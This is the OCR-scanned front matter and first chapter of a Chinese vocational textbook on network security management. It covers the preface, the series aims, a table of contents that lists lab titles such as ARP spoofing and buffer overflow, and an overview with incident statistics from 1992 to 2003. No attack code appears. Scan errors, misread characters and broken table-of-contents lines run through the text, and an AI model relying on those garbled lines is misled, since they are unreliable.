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内 容 简 介 


本 书 在 介绍 网 络 安全 理论 及 其 基础 知识 的 同时 ， 突 出 计算 机 网 络 安全 方面 的 管理 、 配 置 及 维护 的 实际 
操作 方法 ， 并 尽量 跟踪 网 络 安全 技术 的 最 新 成 果 与 发 展 方向 。 全 书 共 分 12 章 ， 分 别 讲述 网 络 安全 的 基本 
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护 方面 的 知识 占 50%。 
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前 言 


随 着 信息 社会 的 到 来 以 及 Intemet 的 迅猛 发 展 ， 网 络 已 经 影响 到 社会 生活 的 各 个 领 
域 ， 给 人 类 的 生活 方式 带 来 了 巨大 的 变革 。 人 们 在 利用 网 络 实现 资源 共享 、 进 行 电 子 商务 
等 社会 活动 ， 享 受 网 络 给 我 们 带 来 便利 的 同时 ， 安 全 问题 也 变 得 日 益 突出 。 黑 客 入 侵 ， 网 
络 病毒 肆虐 ， 网 络 系 统 损坏 或 瘫痪 ， 重 要 数据 被 窃取 或 毁坏 等 ， 给 政府 、 企 业 以 及 个 人 带 
来 了 巨大 的 经 济 损失 ， 也 为 网 络 的 健康 发 展 造 成 了 巨大 的 障碍 。 网 络 信息 安全 问题 已 成 为 
网 络 技术 领域 的 重要 研究 课题 ， 它 已 经 成 为 一 个 组 织 生死 存 亡 或 贸易 鼻 亏 成 败 的 决定 性 因 
素 之 一 ， 因 此 信息 安全 逐渐 成 为 人 们 关注 的 焦点 。 世 界 范围 内 的 各 个 国家 、 机 构 、 组 织 、 
个 人 都 在 探寻 如 何 保障 信息 安全 的 问题 ， 各 相关 部 门 和 研究 机 构 也 纷纷 投入 相当 多 的 人 
力 、 物 力 和 资金 来 试图 解决 信息 安全 问题 。 

作为 高 等 职业 教育 的 教材 ， 本 书 在 介绍 网 络 安全 理论 及 其 基础 知识 的 同时 ， 突 出 计算 
机 网 络 安全 方面 的 管理 、 配 置 及 维护 的 实际 操作 方法 ， 并 尽量 跟踪 网 络 安全 技术 的 最 新 成 
果 与 发 展 方向 。 全 书 网 络 安全 理论 知识 占 40%、 操 作 系统 安全 知识 占 10%、 网 络 安全 配 
置 管理 、 操 作 维护 方面 的 知识 占 50%。 本 书 的 教学 内 容 大 约 需 要 48 课时 ， 实 训 需 32 课 
时 。 部 分 内 容 可 由 各 校 教 师 酌 情 确 定 是 否 讲授 。 

本 书 特 点 主要 体现 在 以 下 三 个 方面 。 首 先是 通俗 易 懂 ， 计 算 机 网 络 的 技术 性 很 强 ， 网 
络 安全 技术 本 身 也 比较 上 涩 难 懂 ， 本 书 力求 以 通俗 的 语言 和 清晰 的 叙述 方式 ， 向 读者 介绍 
计算 机 网 络 安全 的 基本 理论 、 基 本 知识 和 实用 技术 。 其 次 是 突出 实用 ， 通 过 阅读 本 书 ， 读 
者 可 掌握 计算 机 网 络 安全 的 基础 知识 ， 并 了 解 设 计 和 维护 网 络 及 其 应 用 系统 安全 的 基本 手 
段 和 方法 。 本 书 在 编写 形式 上 突出 了 应 用 的 需求 ， 每 一 章 的 理论 内 容 都 力求 结合 实际 案例 
进行 教学 ， 第 12 章 还 设计 了 与 前 述 章节 内 容 配 套 的 实 训 方案 ， 从 而 为 教学 和 自主 学 习 提 
供 了 方便 。 第 三 是 选材 新 颖 ， 计 算 机 应 用 技术 和 网 络 技术 的 发 展 是 非常 迅速 的 ， 本 书 在 内 
容 组 织 上 力图 靠近 新 知识 、 新 技术 的 前 沿 ， 以 使 本 书 能 较 好 地 反映 新 理论 和 新 技术 。 

参加 本 书 编写 的 教师 都 长 期 工作 在 教学 的 第 一 线 ， 具 有 丰富 的 教学 经 验 。 其 中 第 1 章 
和 第 10 章 由 付 忠勇 执笔 第 2 章 和 第 6 章 由 乔 明 秋 执 笔 ， 第 3 章 由 李 星 华 执笔 ， 第 4 章 
和 第 7 章 由 赵 振 洲 执笔 ， 第 5 章 和 第 8 章 由 胡 守 国 执笔 ， 第 9 章 和 第 11 章 由 郑 宝 昆 执 
笔 ， 第 12 章 由 上 述 6 位 老师 共同 完成 。 付 忠勇 、 赵 振 洲 负责 内 容 的 组 织 、 统 稿 和 审定 。 

由 于 水 平 所 限 ， 玲 漏 与 座 误 之 处 在 所 难免 ， 奶 请 专家 、 同 仁 及 广大 读者 批评 指教 。 


《高 职高 专 立 体 化 教材 计算 机 系列 》 从 书 序 


一 、 编 写 目的 


关于 立体 化 教材 , 国内 外 有 多 种 说 法 ， 有 的 叫 “ 立 体 化 教材 ”,， 有 的 叫 “ 一 体 化 教材 ”， 
有 的 叫 “ 多 元 化 教材 ”， 其 目的 是 一 样 的， 就 是 要 为 学 校 提供 一 种 教学 资源 的 整体 解决 方 
案 ， 最 大 限度 地 满足 教学 需要 ， 满 足 教育 市 场 需求 ， 促 进 教学 改革 。 我 们 这 里 所 讲 的 立体 
化 教材 ， 其 内 容 、 形 式 、 服 务 都 是 建立 在 当前 技术 水 平和 条 件 基础 上 的 。 

立体 化 教材 是 一 个 “一 揽 子 ” 式 的 ， 包 括 主教 材 、 教 师 参考 书 、 学 习 指 导 书 、 试 题库 
在 内 的 完整 体系 。 主 教材 讲究 的 是 “精品 ”意识 ， 既 要 具备 指导 性 和 示范 性 ， 也 要 具有 一 
定 的 适用 性 ， 喜 新 不 厌 旧 ， 内 容 愈 编 愈 多 ， 本 子 愈 编 愈 厚 的 低 水 平 重复 建设 在 “立体 化 ” 
的 世界 中 将 被 扫地 出 门 。 和 以 往 不 同 , “立体 化 教材 ”中 的 教师 参考 书 可 不 是 千 人 一 面 的 ， 
教师 参考 书 不 只 是 提供 答案 和 注释 ， 而 是 含有 与 主教 材 配套 的 大 量 参考 资料 ， 使 得 老师 在 
教学 中 能 做 到 “个 性 化 教学 ”。 学 习 指 导 书 更 像 一 本 明晰 的 地 图 册 ， 难 点 、 重 点 、 学 习 方 
法 一 目 了 然 。 试 题库 或 习题 集 则 要 完成 对 教学 效果 进行 测试 与 评价 的 任务 。 这 些 组 成 部 分 
采用 不 同 的 编写 方式 ， 把 教材 的 精华 从 各 个 角度 呈现 给 师 生 ， 既 有 重复 、 强 调 ， 又 有 交叉 
和 补充 ， 相 互 配合 ， 形 成 一 个 教学 资源 有 机 的 整体 。 

除了 内 容 上 的 扩充 ， 立 体 化 教材 的 最 大 突破 还 在 于 在 表现 形式 上 走出 了 “书本 ”这 一 
平面 媒介 的 局 限 ， 如 果 说 音像 制品 让 平面 书本 实现 了 第 一 次 “突围 ”， 那 么 电子 和 网 络 技 
术 的 大 量 运用 就 让 躺 在 书桌 上 的 教材 真正 “ 活 ” 了 起 来 。 用 PowerPoint 开发 的 电子 教案 不 
仅 大 大 减少 了 教师 案头 备课 的 时 间 ， 而 且 也 让 学 生 的 课 后 复习 更 加 有 的 放 矢 。 电 子 图 书 通 
过 数字 化 使 得 教材 的 内 容 得 以 无 限 扩张 ， 使 平面 教材 更 能 发 挥 其 提纲 看 领 的 作用 。 

CAI 课件 把 动画 、 仿 真 等 技术 引入 了 课堂 ， 让 课程 的 难点 和 重点 一 目 了 然 ， 通 过 生动 
的 表达 方式 达到 深入 浅 出 的 目的 。 在 科学 指标 体系 控制 之 下 的 试题 库 既 可 以 轻而易举 地 制 
作 标 准 化 试卷 ， 也 能 让 学 生 进行 模拟 实战 的 在 线 测试 ， 提 高 了 教学 质量 评价 的 客观 性 和 及 
时 性 。 网 络 课程 更 厉害 ， 它 使 教学 突破 了 空间 和 时 间 的 限制 ， 彻 底 发 挥 了 立体 化 教材 本 身 
的 潜力 ， 轻 轻 敲 击 几 下 键盘 ， 你 就 能 在 任何 时 候 得 到 有 关 课 程 的 全 部 信息 。 

最 后 还 有 资料 库 ， 它 把 教学 资料 以 知识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 
频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 策略 组 织 起 来 ， 大 大 方便 了 教师 在 备课 、 开 发 电子 教 
案 和 网 络 课程 时 的 教学 工作 。 如 此 一 来 ， 教 材 就 “ 活 ” 了 。 学 生 和 书本 之 间 的 关系 不 再 像 
领导 与 被 领导 那样 呆板 ， 而 是 真正 有 了 互动 。 教 材 不 再 只 为 老师 们 规定 什么 重要 什么 不 重 
要 ， 而 是 成 为 教师 实现 其 教学 理念 的 最 佳 拍档 。 在 建设 观念 上 ， 从 提供 和 出 版 单一 纸 质 教 
材 转向 提供 和 出 版 较 完整 的 教学 解决 方案 ; 在 建设 目标 上 ， 以 最 大 限度 满足 教学 要 求 为 根 


(> 网络 安全 管理 与 维护 


这 沙 若 特攻 ”十 注 关 从 峰 杀 了 强 对 


以 课程 为 核心 ， 整 合 已 有 资源 并 聚拢 新 资源 。 

网 络 化 、 立 体 化 教材 的 出 版 是 我 社 下 一 阶段 教材 建设 的 重 中 之 重 ， 作 为 以 计算 机 教材 
出 版 为 龙头 的 清华 大 学 出 版 社 确立 了 “改变 思想 观念 ， 调 整 工作 模式 ， 构 建立 体 化 教材 体 
系 ， 大 幅度 提高 教材 服务 ”的 发 展 目 标 。 并 提出 了 首先 以 建设 “高 职高 专 计算 机 立体 化 教 
材 ”为 重点 的 教材 出 版 规划 , 希望 通过 邀请 全 国 范围 内 的 高 职高 专 院 校 的 优秀 教师 , 在 2008 
年 共同 策划 、 编 写 这 一 套 高 职高 专 立体 化 教材 ， 利 用 网 络 等 现代 技术 手段 实现 课程 立体 化 
教材 的 资源 共享 ， 解 决 国内 教材 建设 工作 中 存在 教材 内 容 的 更 新 滞后 于 学 科 发 展 的 状况 。 
把 各 种 相互 作用 、 相 互联 系 的 媒体 和 资源 有 机 地 整合 ， 形 成 立体 化 教材 ， 把 教学 资料 以 知 
识 点 为 单位 ， 通 过 文字 、 图 形 、 图 像 、 音 频 、 视 频 、 动 画 等 各 种 形式 ， 按 科学 的 存储 策略 
组 织 起 来 ， 为 高 职高 专 教学 提供 一 整套 解决 方案 。 


二 、 教 材 特 点 


在 编写 思想 上 ， 以 适应 高 职高 专 教学 改革 的 需要 为 目标 ， 以 企业 需求 为 导向 ， 充 分 吸 
收 国外 经 典 教材 及 国内 优秀 教材 的 优点 ， 结 合 中 国 高 校 计算 机 教育 的 教学 现状 ， 打 造 立 体 
化 精品 教材 。 

在 内 容 安排 上 ， 充 分 体现 先进 性 、 科 学 性 和 实用 性 ， 尽 可 能 选取 最 新 、 最 实用 的 技术 ， 
并 依照 学 生 接受 知识 的 一 般 规 律 , 通过 设计 详细 的 可 实施 的 项 目 化 案例 (而 不 仅仅 是 功能 性 
的 小 例子 )， 帮 助 学 生 掌握 要 求 的 知识 点 。 

在 教材 形式 上 ， 利 用 网 络 等 现代 技术 手段 实现 立体 化 的 资源 共享 ， 为 教材 创建 专门 的 
网 站 ， 并 提供 题库 、 素 材 、 录 像 、CAI 课件 、 案 例 分 析 ， 实 现 教师 和 学 生 在 更 大 范围 内 的 
教 与 学 互动 ， 及 时 解决 教学 过 程 中 遇 到 的 问题 。 

本 系列 教材 采用 案例 式 的 教学 方法 ， 以 实际 应 用 为 主 ， 理 论 够 用 为 度 。 教 程 中 每 一 个 
知识 点 的 结构 模式 为 “案例 (任务 ) 提 出 一 案例 关键 点 分 析 一 具体 操作 步骤 一 相关 知识 (技术 ) 
介绍 (理论 总 结 、 功 能 介绍 、 方 法 和 技巧 等 )”。 

该 系列 教材 将 提供 全 方位 、 立 体 化 的 服务 。 网 上 提供 电子 教案 、 文 字 或 图 片 素材 、 源 
代码 、 在 线 题库 、 模 拟 试卷 、 习 题 答案 、 案 例 动画 演示 、 专 题 拓展 、 教 学 指导 方案 等 。 

在 为 教学 服务 方面 ， 主 要 是 通过 教学 服务 专用 网 站 在 网 络 上 为 教师 和 学 生 提 供 交流 的 
场所 ， 每 个 学 科 、 每 门 课 程 ， 甚 至 每 本 教材 都 建立 网 络 上 的 交流 环境 。 可 以 为 广大 教师 信 
息 交 流 、 学 术 讨论 、 专 家 咨询 提供 服务 ， 也 可 以 让 教师 发 表 对 教材 建设 的 意见 ， 甚 至 通过 
网 络 授课 。 对 学 生来 说 ， 则 在 教学 支撑 平台 上 所 提供 的 自主 学 习 空 间 来 实现 学 习 、 答 疑 、 
作业 、 讨 论 和 测试 ， 当 然 也 可 以 对 教材 建设 提出 意见 。 这 样 ， 在 编辑 、 作 者 、 专 家 、 教 师 、 
学 生 之 间 建 立 起 一 个 以 网 络 为 纽带 、 以 数据 库 为 基础 、 以 网 站 为 门户 的 立体 化 教材 建设 与 
实践 的 体系 ， 用 快捷 的 信息 反馈 机 制 和 优质 的 教学 服务 促进 教学 改革 。 

本 系列 教材 专题 网 站 : http://www.lth.wenyuan.com.cn。 


第 1 章 


Ly 


第 2 章 


21 


22 


23 


网 络 安全 概述 …. 1 
| 
1.1.1 网 络 的 发 展 … .1 
1.1.2 网 络 安全 概念 . : 
1.1.3 ”网 络 安全 现状 . 
网 络 安全 威胁 …… a 
网 络 攻击 .……… .6 
1.3.1 潜在 的 对 手 .6 
1.3.2 ”攻击 的 种 类 .… 由 
网 络 安全 特点 及 属性 . .8 
1.4.1 网 络 安全 特点 . .8 
1.4.2 ”安全 属性 …………… 

1.4.3 如 何 实现 网 络 安全 .. 

网 络 安全 技术 ………… 

1.5.1 网 络 安全 基本 要 i 
152 ”信息 安全 技术 -15 
数字 加 密 与 认证 .14 
密码 学 基础 ……… 
2.1.1 加 密 的 起 源 … 14 
2.1.2 密码 学 的 基本 概念 .. 

2.1.3 ”对 称 密 钥 算法 . 
2.1.4 公开 密 钥 算法 . ..24 
2.1.5 密 钥 管理 … .26 
2.1.6 密码 分 析 … Sp 
数字 签名 与 数字 证 书 . .30 
2.2.1 电子 签名 .… .30 
2.2.2 ”认证 机 构 (CA) : 
2.2.3 数字 签名 … .32 
2.2.4 ” 公 钥 基础 设施 (PKD). we 
2.2.5 数字 证 书 ………… .36 
2.2.6 ”数字 时 间 戳 技术 . 
认证 技术 .… 38 


2.3.1 身份 认证 的 重要 性 .. 


2.4 


32 


3.3 


3.4 


3.5 


3.6 


2.3.2 身份 认证 的 方式 …………. 39 
233 潍 息 认证 sais 
2.3.4 ”认证 技术 的 实际 应 用 
应 用 实例 .…… 
2.4.1 加密 应 用 二 
2.4.2 ”数字 证 书 应 用 .148 


常见 的 网 络 攻击 方法 与 防护 .… 50 


网 络 攻击 概述 …… 
3.1.1 网 络 攻击 分 类 . 
3.1.2 ”网 络 攻击 步骤 . 


3.2.2 口令 攻击 的 类 型.. 
3.2.3 方法 (或 工具 ).…… 


3.4.2 方法 (或 工具 ).… 
3.4.3 ”检测 和 防护 .…. 
网 络 监听 … 
3.5.1 原理 
3.5.2 方法 (或 工具 ).… 
3.5.3 检测 和 防护 .… 
缓冲 区 溢出 … 
3.6.1 原理 ..… 
3.6.2 ”攻击 方式 .… 


(> 网络 安全 管理 与 维护 


潼 洲 车 揪 半 ” 攻 涟 开 侣 村 才 到 娩 到 


4.2 


4.3 


第 5 章 


二 


5.2 


3 


5.4 


7 坟 潜 于 
3.73 ”检测 和 防护 6 
认识 计算 机 病毒 8 
4.1.1 计算 机 病毒 的 概念 .… ze 
4.1.2 计算 机 病毒 的 分 类 .. 78 
4.1.3 计算 机 病毒 的 发 展 趋势 .80 


4.2.1 蠕虫 病毒 .… .84 
4.2.2 ”网 页 脚本 病毒 . 88 
4.2.3 即时 通讯 病毒 . .94 
4.2.4 木马 病毒 … .96 


反 病 毒 产 品 及 解决 方案 ….………………. 98 

4.3.1 主流 反 病毒 产品 特点 
1: 

4.3.2 ” 反 病 毒 安全 体系 的 建立 .… 


防火 墙 技术 .103 


防火 墙 的 基本 概念 与 分 类 .. 
5.1.1 防火 墙 的 基本 概念 .. 
5.1.2 防火墙 的 作用 . 
5.1.3 防火墙 的 优 缺 
5.1.4 防火 墙 的 分 类 . 
防火 墙 技术 ………… 
5.2.1 包 过 滤 技 术 … 
5.2.2 ”应 用 代理 技术 . 
5.2.3 ”状态 检测 技术 . 
5.2.4 技术 展望 
防火 墙 的 体系 结构 
5.3.1 双重 宿主 主机 结构 .… 
5.3.2 屏蔽 主机 结构 .… 
5.3.3 ”屏蔽 子 网 结构 .… 
5.3.4 防火墙 的 组 合 结构 .. 
如 何 选 择 防火 墙 .…… 
5.4.1 选择 防火 墙 的 基本 原 风 
5.4.2 选择 防火 墙 的 注意 事项 
5.4.3 ”常用 防火 墙 产品 介绍 … 


6.2 


6.3 


6.4 


7.2 


7.3 


入 侵 检测 系统 .120 


6.1.1 入 侵 检测 概念 …- 
6.1.2 ”入侵 检测 系统 组 成 .. 
6.1.3 ”入 侵 检测 功能 .… 
6.1.4 ”入侵 检 测 系统 分 类 .. 
入 侵 检 测 技术 …………… 
6.2.1 误 用 检测 技术 . 
6.2.2 异常 检测 技术 . 
6.2.3 ”高 级 检测 技术 . 
6.2.4 入 侵 诱骗 技术 . 
6.2.5 ”入侵 响 应 技术 . 
入 侵 检测 分 析 .……- 
6.3.1 入 侵 检测 特点 分 析 . 
6.3.2 入侵 检 测 与 防火 墙 .. 
6.3.3 入侵 检测 系统 的 缺陷 
常用 入 侵 检 测 产品 介绍 .… 
6.4.1 CA Session Wall... 
GD i 


操作 系统 安全 pe 145 


操作 系统 安全 概述 
7.1.1 操作 系统 安全 的 概念 
7.1.2 操作 系统 安全 的 评估 
Windows 安全 技术 
7.2.1 身份 验证 与 访问 控制 
7.2.2 文件 系统 安全 
7.2.3 注册 表 安 全 
7.2.4 ”审核 与 日 志 
Linux 安全 技术 .…- 
7.3.1 帐号 安全 .… 
7.3.2 文件 系统 安全 . 
7.3.3 ”Linux 日 志 系 统 ………………. 182 


因特网 安全 技术 .188 
因特网 安全 概述 ……………… 

8.1.1 因特网 上 的 安全 隐患 i. 
8.1.2 ”因特网 的 脆弱 性 及 根源 .…… 189 


8.2 


8.3 


8.4 


第 9 章 


9 


92 


93 


第 10 章 


10.1 
102 


103 


10.4 


8.2.1 人 P 安 全 概述 .… 
8.2.2 了 P 安 全 体系 结构 
Windows 2000 的 

Web 安全 技术 
8.3.1 ”Web 安全 分 析 
8.3.2 ”Web 安全 防护 技术 . 
8.3.3 ”安全 套 接 层 协 议 . 
8.3.4 ”安全 电子 交易 协 记 
8.3.5 主页 防 修改 技术 . 
虚拟 专业 网 络 (VPN) 技 术 
8.4.1 VPN 概述 
8.4.2 VPN 的 关键 安全 技术 .. 
8.4.3 VPN 产品 及 解决 方案 ………… 


9.1.1 概念 及 分 类 
9.1.2 设备 ………… 
9.1.3 无 线 网 络 安全 威胁 .… 
9.2.1 方法 与 过 程 .… 
9.2.2 ”空中 传播 的 病毒 . 
9.3.1 基于 访问 点 的 安全 措施 .……… 
399 第 三 方 安生 方 法 ae 


8.2.3 


230 
网 络 安全 管理 ………232 
网 络 安全 管理 的 意义 .………232 

风险 分 析 与 安全 需求 … 

10.2.1 系统 风险 分 析 . 

10.2.2 网络 的 安全 需求 .… 

安全 管理 策略 ……………… 


10.3.1 制定 安全 策略 的 原则 
10.3.2 ”安全 策略 内 容 
建立 网 络 安全 体系 … 
10.4.1 物理 安全 .… 
1042 网络 安 全 ssn 


Mi 


10.5 


10.6 


10.7 


112 


11.3 


11.4 


M5 


10.4.3 系统、 信息 和 应 用 安全 .…. 
安全 管理 实施 
10.5.1 ”安全 管理 的 原则 . 
10.5.2 ”安全 管理 的 实现 .. 


安全 性 测试 及 评估 .……… 

10.6.1 网 络 安全 测试 

10.6.2 ”网 络 安全 的 评估 .. .244 
信息 安全 管理 标准 …… 
10.7.1 国际 信息 安全 管理 标准 … 244 


10.7.2 ”如 何 实施 ISMS.………… 
10.7.3 ”国内 信息 安全 管理 标准 …. 


安全 审核 与 风险 分 析 …………… 


这 全 审核 钱 门 sasswnsss 
11.1.1 审核 人 员 的 职责 .. 
11.1.2 ”风险 评估 
11.1.3 ”安全 审核 注意 事项 
11.2.1 检查 安全 策略 .. 
11.2.2 ”划分 资产 等 级 .. 
1423 溧 统 资源 俩 胡 esas 
11.2.4 


审核 服务 器 渗透 和 攻击 


11.2.5 
审核 和 日 志 分 析 .… 
11.3.1 
11.3.2 
M33 
11.3.4 


操作 系统 日 志 .… 
11.3.5 其 他 类 型 日 志 . 
11.3.6 日 志 的 存储 . 
审核 结果 . 
11.4.1 建立 初步 审核 报告 
11.4.2 ”收集 客户 意见 …… 
11.4.3 ”制定 详细 审核 报告 
11.4.4 “推荐 审核 方案 .. 
11.4.5 排除 安全 隐患 .. 
早期 预警 与 事件 响应 


(CO >》 网络 安全 管理 与 维 扩 


尝 洲 落 粕 半 车 涟 民 合 上 革 儿 到 招 卫 


第 12 章 


12.1 


122 


12.3 


11.5.1 为 不 可 避免 的 情况 做 
准备 … 
蜜 网 .… 
做 好 响应 计划 . 
建立 响应 策略 . 
实施 响应 计划 
容 灾 备份 计划 及 技术 … 


实际 技能 训练 ….……………..269 


数字 证 书 与 数字 签名 实 训 ……………269 
12.1.1 使 用 OpenSSL 生成 证 书 .….269 
12.1.2 用 CA 证 书签 名 、 加 密 ， 

发 送 安全 电子 邮件 ………….275 
Win2000 PKI 应 用 实 训 .… 
12.2.1 安装 证 书 服务 器 .… 
12.2.2 ”安装 客户 端 证 书 .… 
端口 扫描 与 网 络 监听 实 训 , 
12.3.1 使 用 SuperScan 进行 端口 

= OR 06 
12.3.2 ”使 用 Sniffer 工具 进行 

| oo 


11.5.2 


11.5.3 
11.5.4 
了 和 


11.5.6 


12.4 
妈 5 
12.6 
12.7 
12.8 
12.9 
12.10 
12.11 


12.12 


ARP 欺骗 攻击 实 训 ………………. 294 

缓冲 区 溢出 攻击 实 训 

拒绝 服务 攻击 实 训 … 

蠕虫 病毒 分 析 实 训 .……- 

网 页 脚本 病毒 分 析 实 训 

木马 的 防 杀 与 种 植 实 训 
WinRoute 的 安装 与 配置 实 训 .……-: 304 
使 用 pchains 构建 Linux 下 的 
| 
CA Session Wall 的 安装 与 
| 3 | 
12.12.1 CA Session Wall 的 实时 

检测 实 训 …… 314 
12.12.2 在 Session Wall-3 中 创建 、 
设置 审计 规则 实 训 .……. 316 

Windows 文件 系统 安全 实 训 .……. 321 
Windows 系统 VPN 的 实现 
,< 
日 志 分 析 与 安全 审核 实 训 .………… 332 

PN ee 336 


第 1 章 网 络 安全 概述 


e ”网 络 安全 现状 及 面临 的 威胁 
e@ 网络 攻 击 的 类 别 
e@ 网络 安 全 的 特点 、 属 性 及 主要 安全 技术 


近年 来 ， 计 算 机 信息 技术 的 发 展 ， 使 网 络 成 为 全 球 信息 传递 、 信 息 交 互 的 主要 途径 ， 
并 在 政治 、 经 济 、 军 事 、 文 化 、 教 育 等 社会 生活 的 各 个 领域 产生 了 巨大 的 影响 ， 迅 速 改变 
者 人 们 的 生产 和 生活 方式 。 然 而 ， 信 息 网 络 的 发 达 ， 同 时 也 伴随 着 巨大 的 风险 。 事 实 上 
网 络 安全 已 经 成 为 关系 国家 主权 和 国家 安全 、 经 济 繁荣 和 社会 稳定 、 文 化 传承 和 教育 进步 
的 重大 问题 ， 并 且 随 着 全 球 化 步伐 的 加 快 而 愈 显 其 重要 。 因 此 ， 我 们 在 利用 网 络 信息 资源 
的 同时 ， 必 须 加 强 网 络 信息 安全 技术 的 研究 和 开发 。 

网 络 安全 已 经 成 为 网 络 发 展 的 瓶颈 ， 阻 碍 着 网 络 应 用 在 各 个 领域 的 纵深 发 展 。 面 对 网 
络 安全 的 严峻 形势 ， 我 们 应 当 持 辩证 、 客 观 的 态度 ， 一 方面 不 能 因 嘻 废 食 ， 拒 绝 先进 的 网 
络 技术 和 文化 ; 另 一 方面 要 对 网 络 的 安全 威胁 给 予 充 分 的 重视 。 政 府 对 网 络 安全 技术 的 研 
发 给 予 积 极 支持 ， 普 通 网 络 使 用 者 和 网 络 提供 商 也 应 该 充分 认识 到 网 络 安全 及 网 络 管理 的 
重要 性 ， 保 护 好 个 人 、 集 体 和 国家 利益 不 受 侵害 。 

构筑 信息 网 络 安全 防线 事 关 重大 ， 刻 不 容 组 。 


1.1 网 络 安全 现状 


1.1.1 网 络 的 发 展 


20 世纪 末 信 息 技术 领域 内 最 使 人 振奋 的 重大 事件 是 互联 网 的 发 展 ， 它 已 遍及 180 多 个 
国家 和 地 区 。 无 论 你 身 在 办 公 室 、 家 里 、 工 地 、 时 外、 大街 ， 或 是 正在 旅途 中 、 海 边 ， 都 
可 以 与 互联 网 亲密 接触 ! 无 论 是 在 工作 、 学 习 、 玩 游戏 、 炒 股 ， 你 都 需要 互联 网 ! 

据 《 第 20 次 中 国 互联 网 络 发 展 状况 统计 报告 》 统 计 ， 截 至 2007 年 6 月 ， 中 国 网 民 人 
数 已 经 达到 1.62 亿 ， 如 图 1-1 所 示 ， 仅 次 于 美国 2.11 亿 的 网 民 规模 ， 位 居 世 界 第 二 。 这 比 
2006 年 年 末 新 增 了 2500 万 网 民 ， 与 2006 年 同期 相 比 ， 网 民 数 1 年 内 增加 了 3900 万 人 。 
中 国 网 民 年 增长 率 达 到 31.7%， 步 入 新 一 轮 的 快速 增长 阶段 。 

目前 中 国 的 互联 网 普及 率 已 经 达到 12.3%， 比 2006 年 同期 9.4% 的 互联 网 普及 率 提高 
了 接近 3 个 百分点 ， 如 图 1-2 所 示 。 互 联网 在 中 国 的 应 用 正 逐 步 广 泛 化 ， 越 来 越 多 的 人 接 
触 到 互联 网 ， 并 从 互联 网 世界 获 益 。 根据 CNNIC 统计 ， 接 触 过 互联 网 的 人 中 ，99% 都 会 继 
续 上 网 。 
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图 1-1 中 国 网 民 规模 和 年 增长 率 
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1-2 中国 互联 网 普及 率 


1.1.2 网络 安全 概念 


与 能 源 、 物 源 一 样 ， 信 息 资源 同样 具有 价值 ， 在 有 些 情况 下 ， 价 值 更 高 。 具 有 价值 的 
信息 必然 存在 安全 问题 。 

网 络 安全 是 指 保护 网 络 系统 中 的 软件 、 硬 件 及 信息 资源 ， 使 之 免 受 偶然 或 恶意 的 破坏 、 
算 改 和 泄露 ， 保 证 网 络 的 正常 运行 ， 以 及 网 络 服务 不 中 断 。 
网 络 安全 包括 网 络 软 、 硬 件 资源 和 信息 资源 的 安全 性 。 
从 广义 上 讲 ， 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 可 控 性 的 相 
关 技 术 和 理论 都 是 网 络 安全 所 要 研究 的 问题 。 
网 络 安全 涉及 的 内 容 有 技术 方面 的 问题 ， 也 有 管理 方面 的 问题 ， 两 者 相辅相成 ， 缺 一 
不 可 。 


1.1.3 网 络 安全 现状 


互联 网 的 飞速 发 展 ， 使 社会 政治 、 经 济 、 文 化 、 教 育 等 各 个 领域 的 网 络 应 用 蓬勃 兴起 。 
与 此 同时 ，“ 信 息 垃圾 ”、“ 邮 件 炸 弹 ”、“ 电 脑病 毒 ” 等 也 开始 在 网 上 肆意 横行 ， 不 仅 
造成 了 难以 估量 的 社会 资源 的 损失 ， 也 给 网 络 发 展 中 投下 了 巨大 的 阴影 ， 产 生 了 巨大 的 
阻力 。 


目前 
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， 全 球 范围 内 , 平均 每 20 秒 就 会 发 生 一 起 主机 入 侵 事 件 ， 有 高 达 75% 的 网 站 抵御 


不 了 黑客 的 攻击 。 全 球 已 发 现 病毒 及 其 变种 5 万 多 个 ， 而 病毒 所 造成 的 损失 占 到 网 络 经 济 
损失 的 76%。 


1. 全 球 范围 的 网 络 安全 事件 


据 美 
电话 的 用 


国 “世界 日 报 ”1993 年 10 月 报道 ， 由 于 高 技术 犯罪 ， 利 用 侦 读 器 拦截 卫星 通信 
户 号 码 ， 再 转手 复制 出 笼 ，1992 年 美国 就 有 20 亿美 元 的 国际 电话 费 转帐 混乱 ， 


给 公司 造成 严重 损失 。 
2000 年 2 月 包括 Yahoo 在 内 的 若干 世界 最 大 的 网 站 都 遭受 了 黑客 攻击 而 停止 服务 。 


2002 


年 10 月 ， 黑 客 入 侵 微软 公司 一 台 托 管 Windows 测试 网 络 的 服务 器 ， 这 个 服务 器 


是 为 2000 多 位 Windows 用 户 提供 测试 正在 开发 中 的 软件 的 服务 器 。 


2003 


年 2 月 18 日, 美国 3 大 信用 卡 集团 一 一 万 事 达 (MasterCard)、 维 萨 (Visa) 和 美国 运 


通 (American Express) 被 一 个 “未 经 授权 的 入 侵 者 ”成 功 通过 电脑 网 络 安全 漏洞 进入 信用 卡 


网 络 。 
据 美 


国联 邦 调查 局 的 报告 ， 计 算 机 犯罪 是 商业 犯罪 中 最 大 的 犯罪 类 型 之 一 ， 每 笔 犯罪 


的 平均 金额 超过 45000 美元 ， 每 年 因 犯罪 造成 的 经 济 损失 达 百 亿美 元 ， 以 后 还 将 上 升 。 


美国 
据 国 
入 侵 企图 


据 国 


据 


所 示 。 


《防务 新 闻 》2003 年 5 月 12 日 报道 如 下 。 

防 部 计算 机 网 络 作战 联合 特 遗 部 队 统 计 ，1999 一 2002 年 发 生 在 美国 国防 部 网 络 的 
次 数 如 下 所 示 。 

1999 年 : 22000 次 。 

2000 年 : 24000 次 。 

2001 年 : 40000 次 。 

2002 年 : 45000 次 。 

防 信息 系统 局 统计 ，2002 年 国防 部 网 络 的 信息 安全 事故 的 类 型 及 次 数 如 下 所 示 。 
拒绝 服务 ， 即 拒绝 合法 使 用 : 36 次 。 

资源 误 用 : 39 次 。 

网 址 毁损 : 46 次 。 

个 人 帐户 的 未 经 授权 使 用 : 111 次 。 

机 构 帐 户 的 未 经 授权 使 用 : 125 次 。 

病毒 、 蜂 虫 、 特 洛 伊 木马 和 其 他 恶毒 代码 : 265 次 。 

其 他 : 1268 次 。 

侦察 : 488000 次 。 


CERT 协调 中 心 统计 ，1999 一 2002 年 美国 商业 和 学 术 界 网 络 信息 安全 事故 数量 如 下 


1998 年 : 4952 次 。 
1999 年 : 9859 次 。 
2000 年 : 21756 次 。 
2001 年 : 52658 次 。 
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。 ”2002 年 : 82094 次 。 

